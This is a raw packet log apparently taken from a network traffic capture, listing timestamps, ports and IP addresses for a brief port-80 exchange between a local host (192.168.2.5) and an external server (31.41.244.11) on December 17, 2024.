Dec 17, 2024 06:03:22.986900091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.986968040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.987876892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.988001108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.988106012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.989003897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.989099979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.989197016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.990430117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.990508080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.990536928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.990775108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.991225958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.991282940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.991363049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.991416931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.992340088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.992432117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.992448092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.992542982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.993446112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.993506908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.993541002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.993590117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.994544983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.994622946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.994651079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.994790077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.995687962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.995796919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.995798111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.996264935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.996797085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.996866941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.996900082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.997905970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.997992992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.998009920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.999007940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.999036074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.999114037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.999196053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.000138044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.000232935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.000245094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.000305891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.001266003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.001375914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.001405001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.001638889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.002343893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.002454042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.002743959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.003638029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.003654957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.003806114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.003806114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.004569054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.004673004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.004684925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.004868031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.005676985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.005800009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.005985975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.006795883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.006901026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.006922960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.007699013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.007961035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.008050919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.008116961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.008116961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.009012938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.009123087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.009135008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.009234905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.010162115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.010258913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.010262966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.010296106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.011327028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.011352062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.011377096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.011394024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.012337923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.012449026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.012511969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.012527943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.012620926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.013591051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.013717890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.013722897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.013864994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.014708042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.014820099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.014828920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.014889956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.015801907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.015928984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.016031027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.016031027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.016932011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.016983986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.017004967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.017034054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.018043995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.018099070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.018146992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.018203974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.019172907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.019263983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.019274950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.019356966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.020267963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.020389080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.020397902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.020617962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.021399021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.021480083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.021485090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.021533966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.022488117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.022545099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.022587061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.022733927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.157221079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.157253027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.157361031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.157361031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.157706976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.157767057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.157877922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.158001900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.158014059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.158427954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.159029961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.159085035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.159167051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.159284115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.160137892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.160243034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.160265923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.160377979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.161240101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.161331892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.161351919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.161412001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.162347078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.162444115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.162448883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.162509918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.163479090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.163528919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.163599968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.163718939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.164578915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.164671898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.164743900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.164870024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.165688038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.165781975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.165800095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.165930986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.166790962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.166865110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.166908979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.166997910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.167912006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.168019056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.168040991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.168246031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.169027090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.169130087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.169224024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.170145035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.170269966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.170378923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.171274900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.171331882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.171370983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.171864986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.172358990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.172461033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.172472000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.172554970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.173501968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.173612118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.173687935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.173763037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.174597025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.174643040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.174654961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.174746990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.175764084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.175869942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.175883055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.175940990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.176867962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.176948071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.176984072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.177043915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.177920103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.178019047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.178037882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.178105116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.179034948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.179168940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.179172993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.179264069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.180161953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.180260897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.180313110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.181287050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.181402922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.181462049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.182375908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.182441950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.182468891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.183499098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.183568954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.184185028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.184313059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.184678078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.184782028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.184787989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.184830904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.185750961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.185838938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.185868025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.185923100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.186872005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.187016010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.187344074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.187973022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.188071012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.188431978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.189083099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.189151049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.189209938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.190200090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.190331936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.190372944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.191337109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.191406965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.191442013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.191879034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.192464113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.192584991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.192709923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.193587065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.193705082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.193768978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.194657087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.194710970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.194789886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.195184946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.195774078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.195899010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.195926905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.195977926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.196882010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.197000027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.197006941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.197072983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.198009968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.198081017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.198126078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.198188066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.199110031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.199184895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.199332952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.199332952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.200223923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.200385094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.200403929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.200499058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.201316118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.201426983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.201488018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.202420950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.202513933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.202574015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.202574015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.203624010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.203655958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.203711987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.203711987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.204559088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.204658031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.204695940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.204794884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.205646038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.205761909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.205780029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.205879927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.206753016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.206883907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.207180023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.207180023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.207895994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.208041906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.208055973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.208106995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.209053993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.209124088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.209158897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.209301949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.210143089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.210205078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.210248947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.210400105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.211230040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.211294889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.211374998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.211448908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.212351084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.212445021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.212455034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.212543011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.213479996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.213577032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.213618040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.213679075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.214585066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.214699030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.214766026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.214766026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.349490881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.349514961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.349560976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.349958897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.350018024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.350075960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.350202084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.351082087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.351221085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.351255894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.351255894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.352195978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.352303028 CET	80	49850	31.41.244.11	192.168.2.5
